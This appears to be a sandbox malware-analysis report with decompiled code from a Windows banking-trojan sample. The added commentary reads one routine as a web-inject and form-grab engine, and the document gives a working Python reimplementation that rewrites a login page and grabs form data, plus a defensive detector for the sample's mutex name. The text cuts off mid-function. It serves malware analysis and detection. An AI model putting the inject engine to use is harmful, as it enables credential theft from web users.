            							__eflags = _v44 - 0xffffffff;
            							if(_v44 != 0xffffffff) {
            								goto L40;
            							}
            							goto L32;
            						} else {
            							if(_v44 != 0) {
            								__eflags = _v52;
            								goto L30;
            							}
            							_push(0);
            							_push(0xffffe892);
            							goto L39;
            						}
            					}
            					_t168 =  *0x41aa0c; // 0x0
            					_t150 = _t109 * 0x38 + _t168;
            					_t157 =  *((intOrPtr*)(_t150 + 0x18)) + _t170;
            					_t11 = _t150 + 0x14; // 0x14
            					if(E004103A8( *((intOrPtr*)(_t150 + 0x18)) + _t170, _t11) == 0) {
            						goto L38;
            					} else {
            						_t170 = _v52;
            						goto L11;
            					}
            				}
            			}
            0x0040af24
            0x0040af29
            0x0040af2e
            0x0040af33
            0x0040b229
            0x0040b230
            0x00000000
            0x0040af4d
            0x0040af53
            0x0040af59
            0x0040af5b
            0x0040af63
            0x0040b222
            0x0040b223
            0x00000000
            0x0040b223
            0x0040af6c
            0x0040af76
            0x0040b1bc
            0x0040b1bf
            0x0040b1c2
            0x0040b1c5
            0x0040b1c7
            0x0040b1c7
            0x0040b1ca
            0x0040b1ca
            0x0040b1d7
            0x0040b1dc
            0x0040b1e2
            0x0040b1e5
            0x0040b1e9
            0x0040b1f1
            0x0040b1f1
            0x0040b1f7
            0x0040b1fd
            0x0040b239
            0x0040b23f
            0x0040b23f
            0x0040af80
            0x00000000
            0x00000000
            0x0040af87
            0x0040af94
            0x0040afa0
            0x0040afa4
            0x0040b21c
            0x0040b21c
            0x00000000
            0x0040b21c
            0x0040afab
            0x0040afad
            0x0040afb2
            0x0040afb7
            0x0040b201
            0x0040b201
            0x0040b203
            0x0040b208
            0x0040b208
            0x0040b20e
            0x0040b215
            0x0040b216
            0x00000000
            0x0040b216
            0x0040afbd
            0x0040afc3
            0x0040afe9
            0x0040afec
            0x0040aff2
            0x0040aff8
            0x0040b005
            0x0040b00a
            0x0040b00a
            0x0040b017
            0x0040b01c
            0x0040b023
            0x0040b047
            0x0040b04c
            0x0040b053
            0x0040b073
            0x0040b080
            0x0040b084
            0x0040b088
            0x0040b08e
            0x0040b099
            0x0040b09b
            0x0040b0a1
            0x0040b0b0
            0x0040b0ba
            0x0040b0bb
            0x0040b0f7
            0x0040b117
            0x0040b11c
            0x0040b121
            0x0040b121
            0x0040b0bd
            0x0040b0bd
            0x0040b0c4
            0x0040b0c6
            0x0040b0d3
            0x0040b0d6
            0x0040b0e2
            0x0040b0e5
            0x0040b0ea
            0x0040b0ee
            0x0040b0ee
            0x0040b123
            0x0040b12a
            0x0040b13f
            0x0040b13f
            0x0040b144
            0x0040b149
            0x0040b14f
            0x0040b152
            0x0040b152
            0x0040b0a1
            0x0040b08e
            0x0040b159
            0x0040b15e
            0x0040b15e
            0x0040b163
            0x0040b163
            0x0040b16e
            0x0040b185
            0x0040b185
            0x0040b192
            0x0040b198
            0x0040b19e
            0x0040b1a4
            0x0040b1a7
            0x0040b1aa
            0x0040b1ad
            0x0040b1b2
            0x0040b1b6
            0x0040b1b9
            0x00000000
            0x0040b1b9
            0x0040b187
            0x0040b18c
            0x00000000
            0x00000000
            0x00000000
            0x0040b170
            0x0040b174
            0x0040b181
            0x00000000
            0x0040b181
            0x0040b176
            0x0040b177
            0x00000000
            0x0040b177
            0x0040b16e
            0x0040afc5
            0x0040afce
            0x0040afd3
            0x0040afd5
            0x0040afdf
            0x00000000
            0x0040afe5
            0x0040afe5
            0x00000000
            0x0040afe5
            0x0040afdf

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040AF59
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040AF87
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040AFAB
            • LeaveCriticalSection.KERNEL32(0041A9F0,00000000,?,?), ref: 0040B1F7
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B216
              • Part of subcall function 00415540: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-0041AA0C,?,00000000), ref: 0041559A
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B223
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$Leave$EnterObjectSingleWait$FreeHeap
            • String ID: 0$%x$Content-Length
            • API String ID: 197861008-3838797520
            • Opcode ID: 4395f1477fdfaa6c1f1e82e5c758a8e1d405cfb2a719a51da153664d4dda7306
            • Instruction ID: bdc1bea6f22d6aebb034f930d03155592da30f4eb9f235f8e930ea43e27315db
            • Opcode Fuzzy Hash: 4395f1477fdfaa6c1f1e82e5c758a8e1d405cfb2a719a51da153664d4dda7306
            • Instruction Fuzzy Hash: 2791D272500316AFC700DF25C98596EBBB4FF94354F00462EF950A72A2C778E9A5CBDA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E004072B2(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, intOrPtr* _a12) {
            				char _v540;
            				char _v800;
            				char _v804;
            				char _v860;
            				char _v864;
            				char _v876;
            				struct _SYSTEMTIME _v896;
            				intOrPtr _v968;
            				intOrPtr _v980;
            				intOrPtr _v984;
            				intOrPtr _v988;
            				char* _v992;
            				char _v995;
            				char _v996;
            				char _v1000;
            				void* _v1008;
            				struct _SYSTEMTIME _v1028;
            				signed short* _v1032;
            				signed short* _v1036;
            				signed short _v1040;
            				intOrPtr* _v1044;
            				signed int _v1048;
            				void* _v1052;
            				signed int _v1056;
            				signed int _v1060;
            				char _v1064;
            				intOrPtr _v1068;
            				char _v1072;
            				intOrPtr _v1076;
            				intOrPtr _v1080;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t151;
            				signed int _t152;
            				intOrPtr _t153;
            				signed int _t161;
            				void* _t180;
            				void* _t191;
            				signed short _t203;
            				signed int _t208;
            				signed int _t211;
            				signed char _t215;
            				signed int _t217;
            				void* _t220;
            				void* _t221;
            				signed int _t222;
            				signed int _t223;
            				signed short* _t232;
            				signed short _t233;
            				void* _t235;
            				signed int _t243;
            				intOrPtr* _t247;
            				signed int _t248;
            				intOrPtr _t251;
            				intOrPtr* _t276;
            				signed int _t281;
            				long _t284;
            				signed short* _t286;
            				signed short* _t288;
            				signed int _t291;
            				intOrPtr* _t293;
            				signed int _t297;
            				void* _t299;
            
            				_t299 = (_t297 & 0xfffffff8) - 0x424;
            				_v1028.wYear = _v1028.wYear & 0x00000000;
            				if(__eax <= 0) {
            					L51:
            					asm("sbb eax, eax");
            					return  ~0x00000000;
            				} else {
            					_t276 = __ecx + 0x10;
            					_v1044 = _t276;
            					_v1028.wDayOfWeek = __eax;
            					do {
            						_t251 =  *_t276;
            						if(_t251 == 0) {
            							_t247 = _a8;
            							L6:
            							_t252 =  *(_t276 + 4);
            							_v1048 = _v1048 & 0x00000000;
            							_v1060 = _v1060 & 0x00000000;
            							_t151 =  *((intOrPtr*)(_t276 + 8)) + _t252;
            							_v1028.wSecond = _t151;
            							if(_t252 >= _t151) {
            								L36:
            								_t152 =  *(_t276 - 0x10);
            								_t284 = 0;
            								if((_t152 & 0x00000008) != 0 && _v1048 != 0) {
            									if((_t152 & 0x00000200) == 0) {
            										_t248 = E0041065D(_t152 | 0xffffffff, 0, _a4);
            										__eflags = _t248;
            										if(_t248 != 0) {
            											_t180 = 5;
            											E0040F369(_t180,  &_v996);
            											_push(_v1048);
            											E0040D965(_t252, _t270, __eflags, 0xc9, _t248, 0,  &_v996, _t248);
            											_t299 = _t299 + 0x18;
            											E00410418(_t248);
            										}
            									} else {
            										_t270 = 0x3c;
            										E004104CB( &_v996,  &_v996, 0, _t270);
            										_v992 =  &_v800;
            										_v1008 = _t270;
            										_v988 = 0x103;
            										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
            											GetSystemTime( &_v1028);
            											_t296 =  &_v876;
            											_t191 = 4;
            											E0040F369(_t191,  &_v876);
            											_push(_v1028.wDay & 0x0000ffff);
            											_push(_v1028.wMonth & 0x0000ffff);
            											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
            											_push( &_v804);
            											_t270 = 0x104;
            											E004111A5( &_v876, 0x104,  &_v540, _t296);
            											_t299 = _t299 + 0x14;
            											E0040D77B(_t252, 0x104, 2, 0,  &_v540, _v1064, _v1076);
            											_t276 = _v1080;
            										}
            									}
            									E00410418(_v1048);
            									_t284 = 0;
            								}
            								if( *((intOrPtr*)(_t276 - 4)) != _t284) {
            									if(( *(_t276 - 0x10) & 0x00000010) == 0) {
            										EnterCriticalSection(0x41a9bc);
            										E00410418( *0x41a9d4);
            										_t161 = E00410882(E00410418( *0x41a9d8) | 0xffffffff,  *((intOrPtr*)(_t276 - 0xc)));
            										 *0x41a9d4 = _t161;
            										__eflags = _t161 | 0xffffffff;
            										 *0x41a9d8 = E00410882(_t161 | 0xffffffff,  *((intOrPtr*)(_t276 - 4)));
            										LeaveCriticalSection(0x41a9bc);
            									} else {
            										E00403F5F( &_v860, _t252, 1,  &_v996);
            										if(E00411780( &(_v896.wSecond),  *((intOrPtr*)(_t276 - 4)), E00411086( *((intOrPtr*)(_t276 - 4)))) != 0) {
            											E00410CE3( &_v860,  &_v876);
            											GetLocalTime( &_v896);
            											E004144D2( &_v860,  &_v1000,  &_v864, 3,  &_v896, 0x10);
            										}
            									}
            								}
            								goto L50;
            							} else {
            								goto L9;
            								L13:
            								_t270 =  *_t203 & 0x0000ffff;
            								if(_t270 != 4) {
            									_t252 = (_t270 & 0x0000ffff) - 4;
            									_t211 = E004066A8(_t203 + 4, 0,  &_v1052, (_t270 & 0x0000ffff) - 4,  *_t247 + _v1056,  *_a12 - _v1056);
            									__eflags = _t211;
            									if(_t211 == 0) {
            										goto L34;
            									} else {
            										__eflags =  *_v1032 - 4;
            										_t288 = _v1036;
            										if( *_v1032 != 4) {
            											_t48 =  &_v1052;
            											 *_t48 = _v1052 + _v1056;
            											__eflags =  *_t48;
            										} else {
            											_v1056 = _v1052;
            										}
            										goto L22;
            									}
            								} else {
            									if( *_t252 != _t270) {
            										_t243 = _v1056;
            									} else {
            										_t243 =  *_a12;
            									}
            									_v1052 = _t243;
            									L22:
            									_t252 = _v1052 - _v1056;
            									_t215 =  *(_v1044 - 0x10);
            									_t281 = ( *_t288 & 0x0000ffff) - 4;
            									_v1040 = _t252;
            									if((_t215 & 0x00000004) == 0) {
            										__eflags = _t215 & 0x00000008;
            										if((_t215 & 0x00000008) != 0) {
            											_t217 = E004103A8(_t252 + _t281 + _v1060 + 2,  &_v1048);
            											__eflags = _t217;
            											if(_t217 != 0) {
            												_t291 = _v1048;
            												__eflags = _t281;
            												if(_t281 > 0) {
            													E00410454(_v1060 + _t291,  &(_v1036[2]), _t281);
            													_t78 =  &_v1072;
            													 *_t78 = _v1072 + _t281;
            													__eflags =  *_t78;
            												}
            												_t270 = _v1040;
            												_t220 = E00410454(_v1060 + _t291,  *_t247 + _v1056, _t270);
            												_t252 = _v1056;
            												__eflags =  *(_t252 - 0x10) & 0x00000100;
            												if(( *(_t252 - 0x10) & 0x00000100) == 0) {
            													_t221 = E004151C4(_t220, _t270);
            													_t89 =  &_v1064;
            													 *_t89 = _v1064 + _t221;
            													__eflags =  *_t89;
            													_t247 = _a8;
            												} else {
            													_v1060 = _v1060 + _t270;
            												}
            												_t222 = _v1060;
            												 *((char*)(_t222 + _t291)) = 0xa;
            												_t223 = _t222 + 1;
            												__eflags = _t223;
            												_v1060 = _t223;
            												 *((char*)(_t223 + _t291)) = 0;
            											}
            										}
            									} else {
            										_t232 =  *_a12 - _t252 + _t281;
            										_v1032 = _t232;
            										if(_t232 != 0) {
            											_t233 = E004103ED(_t232);
            											_v1040 = _t233;
            											if(_t233 != 0) {
            												_t270 = _v1056;
            												_t235 = E00410454(E00410454(_t233,  *_t247, _v1056) + _v1056,  &(_t288[2]), _t281);
            												_t293 = _a12;
            												_t252 =  *_t247 + _v1076;
            												E00410454(_t235 + _t281 + _v1056,  *_t247 + _v1076,  *_t293 - _v1076);
            												E00410418( *_t247);
            												_v1068 = _v1068 + 1;
            												 *_t247 = _v1080;
            												 *_t293 = _v1072;
            											}
            										}
            									}
            									L34:
            									if(_v1028.wHour < _v1028.wSecond) {
            										_t252 = _v1028.wHour;
            										L9:
            										_t203 = _t252 + ( *_t252 & 0x0000ffff);
            										_t286 = ( *_t203 & 0x0000ffff) + _t203;
            										_v1028.wHour = _t286 + ( *_t286 & 0x0000ffff);
            										_t270 =  *_t252 & 0x0000ffff;
            										_v1032 = _t252;
            										_v1040 = _t203;
            										_v1036 = _t286;
            										if(( *_t252 & 0x0000ffff) != 4) {
            											goto L11;
            										} else {
            											_v1056 = _v1056 & 0x00000000;
            											goto L13;
            										}
            									} else {
            										_t276 = _v1044;
            										goto L36;
            									}
            								}
            								L11:
            								_t208 = E004066A8( &(_t252[2]),  &_v1056, 0, (_t270 & 0x0000ffff) - 4,  *_t247,  *_a12);
            								__eflags = _t208;
            								if(_t208 == 0) {
            									goto L34;
            								} else {
            									_t252 = _v1032;
            									_t288 = _v1036;
            									_t203 = _v1040;
            									goto L13;
            								}
            							}
            						}
            						_v995 = 0x2a;
            						_v996 = 0x3f;
            						_v992 = _t251;
            						_t153 = E00411086(_t251);
            						_t247 = _a8;
            						_v988 = _t153;
            						_v984 =  *_t247;
            						_v980 =  *_a12;
            						_v968 = 0x12;
            						if(E0041145A( &_v996) != 0) {
            							goto L6;
            						}
            						L50:
            						_t276 = _t276 + 0x1c;
            						_t143 =  &(_v1028.wDayOfWeek);
            						 *_t143 = _v1028.wDayOfWeek - 1;
            						_v1044 = _t276;
            					} while ( *_t143 != 0);
            					goto L51;
            				}
            			}
            Instruction addresses for the C code above (flattened address column, one entry per decompiled line; entries run from 0x004072b8 to 0x00407751)

            APIs
            • InternetCrackUrlA.WININET ref: 0040759A
            • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004075B8
            • GetLocalTime.KERNEL32(?,?,?,?,00000000,00000001,?), ref: 004076C1
            • EnterCriticalSection.KERNEL32(0041A9BC), ref: 004076ED
            • LeaveCriticalSection.KERNEL32(0041A9BC,?,?), ref: 0040772A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
            • String ID: *$?
            • API String ID: 2400141425-2367018687
            • Opcode ID: 63ab0a42a8ead902a5bdf2fb5ae747b6ed52468fc7cc668d6d8b7afa0da27cdb
            • Instruction ID: 392519b071d91e1097d54d43a028b7cb0d4d4180e20fb72250ebccf4c8f84bc5
            • Opcode Fuzzy Hash: 63ab0a42a8ead902a5bdf2fb5ae747b6ed52468fc7cc668d6d8b7afa0da27cdb
            • Instruction Fuzzy Hash: 3BD17D719083419FD710DF69C880AABB7E4FF88318F00492EF995A7291D778E945CB6B
            Uniqueness

            Uniqueness Score: -1.00%
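            Reading E004072B2 above: the routine walks a table of 0x1c-byte entries (count in __eax, entries from __ecx+0x10). When the string at entry+0 is non-null it is matched against the caller's buffer (*_a8, length *_a12) through E0041145A with "?*" supplied as the wildcard characters; a null string skips that check. The entry then points (entry+4, entry+8) at a run of length-prefixed records with a 4-byte header, so a length of 4 means an empty record. For each triple of records the first is searched from the top of the buffer (E004066A8 returning the end of the hit in _v1056), the second from just past that hit (_v1052), and then, depending on the flags word at entry-0x10, the third record is either spliced into the buffer in place of the span between the two hits (flag 0x4: new buffer, old one freed, counter _v1068 incremented, pointer and length handed back through *_t247 and *_t293) or copied as label + span + '\n' into a grab buffer (flag 0x8). After the loop that grab buffer is either passed to E0040D965 with type 0xc9 (flag 0x200 clear) or, after InternetCrackUrlA splits the URL in _a4, to E0040D77B under a name built from the host component and the current date. That is the shape of a web-inject engine; the reading of the three records as before/after/inject and of 0x4/0x8 as inject/grab is an interpretation of the decompile, not something the report states. The Python below is an added reference implementation of that matching and splicing written for this page, not the sample's code; the rule field names and the sample page are constructed for readability.

```python
import re
from dataclasses import dataclass


@dataclass
class InjectRule:
    """One record of a constructed web-inject rule set (field names are illustrative)."""
    context_mask: str          # wildcard mask ('*' any run, '?' one byte) tested against the body
    data_before: bytes         # first record: anchor searched from the top of the body
    data_after: bytes          # second record: anchor searched from just past data_before
    data_inject: bytes = b""   # third record: replacement text, or the label of a grabbed span
    grab: bool = False         # False: rewrite the span (flag 0x4); True: copy it out (flag 0x8)


def wildcard_match(mask: str, data: bytes) -> bool:
    """Anchored, case-insensitive match of a '*'/'?' mask against a byte buffer (ASCII masks)."""
    parts = [".*" if c == "*" else "." if c == "?" else re.escape(c) for c in mask]
    pattern = "".join(parts).encode("latin-1")
    return re.fullmatch(pattern, data, re.DOTALL | re.IGNORECASE) is not None


def find_region(body: bytes, rule: InjectRule):
    """Return the [start, end) span a rule operates on, or None if an anchor is missing.

    The cases follow the branches of the decompiled loop: a present data_before moves the
    start past its hit; a present data_after ends the span at its hit; an empty data_after
    with a present data_before gives an empty span right after it (pure insert); an empty
    data_before with a present data_after gives an empty span just before it; two empty
    anchors select the whole buffer (the *_a12 branch).
    """
    if rule.data_before:
        hit = body.find(rule.data_before)
        if hit == -1:
            return None
        start = hit + len(rule.data_before)
        if not rule.data_after:
            return start, start
        end = body.find(rule.data_after, start)
        return None if end == -1 else (start, end)
    if rule.data_after:
        hit = body.find(rule.data_after)
        return None if hit == -1 else (hit, hit)
    return 0, len(body)


def apply_rules(body: bytes, rules: list) -> tuple:
    """Apply matching rules in order; returns (rewritten body, grabbed fragments, inject count).

    Each rewrite replaces the body that later rules see, mirroring the decompiled code
    swapping the caller's buffer pointer and length after every injection.
    """
    grabbed = []
    injected = 0
    for rule in rules:
        if not wildcard_match(rule.context_mask, body):
            continue
        span = find_region(body, rule)
        if span is None:
            continue
        start, end = span
        if rule.grab:
            # label + matched span + newline, as the grab branch assembles its buffer
            grabbed.append(rule.data_inject + body[start:end] + b"\n")
        else:
            body = body[:start] + rule.data_inject + body[end:]
            injected += 1
    return body, grabbed, injected


# Constructed input: a small login page and three rules (not taken from the sample).
SAMPLE_BODY = (b"<html><body><form action='/login'>\n"
               b"<input name='user'>\n<input name='pass'>\n"
               b"</form></body></html>")

SAMPLE_RULES = [
    InjectRule("*<form*", b"<input name='pass'>", b"", b"\n<input name='pin'>"),   # insert a field
    InjectRule("*", b"action='", b"'", b"action=", grab=True),                     # grab the target
    InjectRule("*nomatch*", b"<body>", b"", b"never applied"),                     # mask fails
]

if __name__ == "__main__":
    out, grabs, count = apply_rules(SAMPLE_BODY, SAMPLE_RULES)
    print(count, grabs)
    print(out.decode())
```

            Two details worth keeping in mind when reproducing an inject from a recovered config: the anchors are plain byte searches on the current buffer, so a rule that fires changes what every later rule sees, and a rule with two empty anchors replaces the entire response rather than inserting into it.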

            C-Code - Quality: 93%
            			E0040DD5A(void* __ecx, void* __edx, void* __eflags) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				intOrPtr _v28;
            				char _v92;
            				void* __ebx;
            				void* __edi;
            				intOrPtr _t22;
            				void* _t25;
            				long _t27;
            				void* _t28;
            				long _t29;
            				void* _t33;
            				void* _t37;
            				void* _t39;
            				void* _t42;
            				void* _t45;
            				void* _t52;
            				void* _t57;
            				void* _t62;
            				void* _t70;
            				WCHAR* _t74;
            				void* _t75;
            				void* _t79;
            				void* _t80;
            
            				_t70 = __edx;
            				_t64 = __ecx;
            				_t22 = E00403D00(__ecx, __eflags, 0x743c1521, 2);
            				_v28 = _t22;
            				if(_t22 != 0) {
            					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
            					_t25 = E00403E39();
            					__eflags = _t25;
            					if(_t25 == 0) {
            						L24:
            						E00413A4E(_v28);
            						__eflags = 0;
            						return 0;
            					}
            					_t27 = WaitForSingleObject( *0x41a758, 0xea60);
            					__eflags = _t27 - 0x102;
            					if(_t27 != 0x102) {
            						goto L24;
            					}
            					do {
            						_t28 = E00405F53(_t64);
            						_v24 = _t28;
            						__eflags = _t28;
            						if(__eflags == 0) {
            							goto L22;
            						}
            						_t62 = E00416037( &_v16, _t70, __eflags, _t28, 2, 0x20000000);
            						_v20 = _t62;
            						__eflags = _t62;
            						if(__eflags == 0) {
            							L21:
            							E00410418(_v20);
            							E00410418(_v24);
            							goto L22;
            						}
            						_t64 = _v16;
            						_t33 = E0040DA9F(_v16, __eflags, _t62);
            						__eflags = _t33;
            						if(_t33 == 0) {
            							goto L21;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							_v8 = E0041133B(_t62, 1);
            							_v12 = E0041133B(_t62, 2);
            							_t37 = E00411888(_t62, E00411086(_t62));
            							_t68 = _v8;
            							_t39 = E00411888(_t68, E00411086(_v8));
            							_t69 = _v12;
            							_push(E00411888(_t69, E00411086(_v12)));
            							_push(_t39);
            							_push(_t37);
            							_push(L"Global\\%08X%08X%08X");
            							_t70 = 0x20;
            							_t74 =  &_v92;
            							_t42 = E004111A5(_t41, _t70, _t74);
            							_t80 = _t80 + 0x10;
            							__eflags = _t42 - 0x1f;
            							if(_t42 != 0x1f) {
            								goto L20;
            							}
            							_t45 = CreateMutexW(0x41a2c8, 1, _t74);
            							__eflags = _t45;
            							if(_t45 == 0) {
            								_t79 = 0;
            								__eflags = 0;
            							} else {
            								_t79 = E00413A5E(_t45);
            							}
            							__eflags = _t79;
            							if(_t79 != 0) {
            								_t75 = HeapAlloc( *0x41bc68, 8, 0x14);
            								__eflags = _t75;
            								if(_t75 == 0) {
            									L19:
            									E00413A4E(_t79);
            									goto L20;
            								}
            								 *_t75 = E00410882(_t46 | 0xffffffff, _t62);
            								 *(_t75 + 4) = E00410882(_t48 | 0xffffffff, _v8);
            								_t52 = E00410882(_t50 | 0xffffffff, _v12);
            								__eflags =  *_t75;
            								 *(_t75 + 8) = _t52;
            								 *(_t75 + 0xc) = _t79;
            								if( *_t75 == 0) {
            									L18:
            									E00410418( *_t75);
            									E00410418( *(_t75 + 4));
            									E00410418( *(_t75 + 8));
            									E00410418(_t75);
            									goto L19;
            								}
            								__eflags =  *(_t75 + 4);
            								if( *(_t75 + 4) == 0) {
            									goto L18;
            								}
            								__eflags = _t52;
            								if(_t52 == 0) {
            									goto L18;
            								}
            								_t57 = E00411E25(0x80000, E0040DBA4, _t75);
            								__eflags = _t57;
            								if(_t57 > 0) {
            									goto L20;
            								}
            								goto L18;
            							}
            							L20:
            							_t64 = _t62;
            							_t62 = E0041133B(_t62, 3);
            							__eflags = _t62;
            						} while (_t62 != 0);
            						goto L21;
            						L22:
            						_t29 = WaitForSingleObject( *0x41a758, 0xea60);
            						__eflags = _t29 - 0x102;
            					} while (_t29 == 0x102);
            					goto L24;
            				}
            				return _t22 + 1;
            			}
            Instruction addresses for the C code above (flattened address column, one entry per decompiled line; entries run from 0x0040dd5a to 0x0040df50)

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • GetCurrentThread.KERNEL32 ref: 0040DD7B
            • SetThreadPriority.KERNEL32(00000000), ref: 0040DD82
            • WaitForSingleObject.KERNEL32(0000EA60), ref: 0040DDA0
            • CreateMutexW.KERNEL32(0041A2C8,00000001,?,20000000), ref: 0040DE63
            • HeapAlloc.KERNEL32(00000008,00000014), ref: 0040DE8A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CreateMutexThread$AllocCurrentHeapObjectPrioritySingleWait
            • String ID: Global\%08X%08X%08X
            • API String ID: 1505615485-3239447729
            • Opcode ID: c10627ba3208524f0223781e0d581368e38704ff0f5d5fc6b1b5f419f8f1845c
            • Instruction ID: a30a8260ae780317d42c52654180516328ecbbc272e723380c7bb3867ec0be5c
            • Opcode Fuzzy Hash: c10627ba3208524f0223781e0d581368e38704ff0f5d5fc6b1b5f419f8f1845c
            • Instruction Fuzzy Hash: 0041D970E4020676DB107BB28D46F9E7A65AF10755F10863FF611B62E2DB7C8D8486AC
            Uniqueness

            Uniqueness Score: -1.00%
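            E0040DD5A above lowers its thread to THREAD_PRIORITY_IDLE (0xfffffff1 is -15), then once per minute (WaitForSingleObject on the event at 0x41a758 with a 0xea60 ms timeout; anything other than WAIT_TIMEOUT, 0x102, ends the loop) walks a list from E00405F53/E00416037. For each element it formats L"Global\\%08X%08X%08X" from three values produced by E00411888 over each of three strings and their E00411086 lengths (presumably a hash, but the report does not show that routine), creates the mutex with CreateMutexW, passes the handle through E00413A5E, and on success stores copies of the three strings plus the handle in a 0x14-byte heap record that becomes the argument of a new thread (E00411E25 with a 0x80000-byte stack and routine E0040DBA4). For detection, the stable artifact is the name shape: a Global\ mutex whose name is exactly 24 upper-case hex digits. The Python below is an added example for this page, not the sample's or the sandbox's code. It scans constructed handle-listing lines in a made-up tab-separated layout and accepts both the Win32 spelling that API monitors log (Global\...) and the object-manager path a handle enumerator shows for a global object (\BaseNamedObjects\...); session-local names under \Sessions\N\ are excluded on purpose because this sample always uses the Global prefix.

```python
import re
from collections import defaultdict

# Shape of the sample's mutex name: "Global\" + three %08X fields = 24 upper-case hex digits.
# Group 1 captures the hex part. API-monitor logs record the name as passed to CreateMutexW;
# handle enumerators show the object-manager path, where the Global\ prefix resolves to
# \BaseNamedObjects\. Lower-case hex is rejected because %08X never produces it.
MUTEX_NAME_RE = re.compile(r"^(?:Global\\|\\BaseNamedObjects\\)([0-9A-F]{24})$")


def scan_handle_lines(lines):
    """Return {pid: [(image, hexname), ...]} for every Mutant handle whose name has that shape.

    Input lines use a constructed layout: pid, image, object type, name, tab-separated.
    Blank lines, '#' comments and lines without exactly four fields are skipped.
    """
    hits = defaultdict(list)
    for raw in lines:
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 4:
            continue
        pid, image, kind, name = fields
        if kind != "Mutant":          # mutexes appear as Mutant objects in a handle dump
            continue
        m = MUTEX_NAME_RE.match(name)
        if m:
            hits[int(pid)].append((image, m.group(1)))
    return dict(hits)


def shared_names(hits):
    """Map each flagged name to the sorted pids holding it, keeping only names held by more
    than one process; the sample uses the mutex as a cross-process guard, so those are the
    first ones to pivot on."""
    by_name = defaultdict(set)
    for pid, entries in hits.items():
        for _image, hexname in entries:
            by_name[hexname].add(pid)
    return {name: sorted(pids) for name, pids in by_name.items() if len(pids) > 1}


# Constructed sample: process names, pids and handle names are made up for this example.
SAMPLE_LINES = [
    "# pid\timage\ttype\tname",
    "\t".join(("1234", "browser_host.exe", "Mutant", r"\BaseNamedObjects\0F1E2D3C4B5A69788796A5B4")),
    "\t".join(("1234", "browser_host.exe", "Mutant", r"\Sessions\1\BaseNamedObjects\SomeAppSingleton")),
    "\t".join(("5678", "svc_agent.exe", "Mutant", r"Global\0F1E2D3C4B5A69788796A5B4")),
    "\t".join(("5678", "svc_agent.exe", "Section", r"\BaseNamedObjects\0F1E2D3C4B5A69788796A5B4")),
    "\t".join(("9012", "updater.exe", "Mutant", r"\BaseNamedObjects\0f1e2d3c4b5a69788796a5b4")),
    "\t".join(("9012", "updater.exe", "Mutant", r"\BaseNamedObjects\0F1E2D3C4B5A69788796A5B")),
]

if __name__ == "__main__":
    found = scan_handle_lines(SAMPLE_LINES)
    for pid, entries in sorted(found.items()):
        for image, hexname in entries:
            print(f"pid {pid} ({image}): Global\\{hexname}")
    print("shared:", shared_names(found))
```

            Twenty-four hex digits on their own are weak evidence, since other software also derives object names from hashes; treat a hit as a pivot into the process's other behaviour recorded in this report (the one-minute polling thread, the InternetCrackUrlA path in E004072B2) rather than as a verdict.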

            C-Code - Quality: 80%
            			E00408302(char* __ecx, char* __edx, void* __eflags) {
            				intOrPtr _v8;
            				char _v12;
            				intOrPtr _v16;
            				char* _v20;
            				char _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				char _v64;
            				char _v72;
            				char _v92;
            				char _v116;
            				char _v160;
            				char _v188;
            				char _v260;
            				short _v774;
            				char _v780;
            				short _v1300;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t47;
            				void* _t49;
            				void* _t54;
            				void* _t56;
            				void* _t60;
            				void* _t62;
            				void* _t64;
            				void* _t71;
            				void* _t73;
            				void* _t78;
            				WCHAR* _t104;
            				signed int _t105;
            				WCHAR* _t106;
            				char* _t112;
            				intOrPtr _t113;
            				void* _t116;
            				intOrPtr _t129;
            
            				_t103 = __edx;
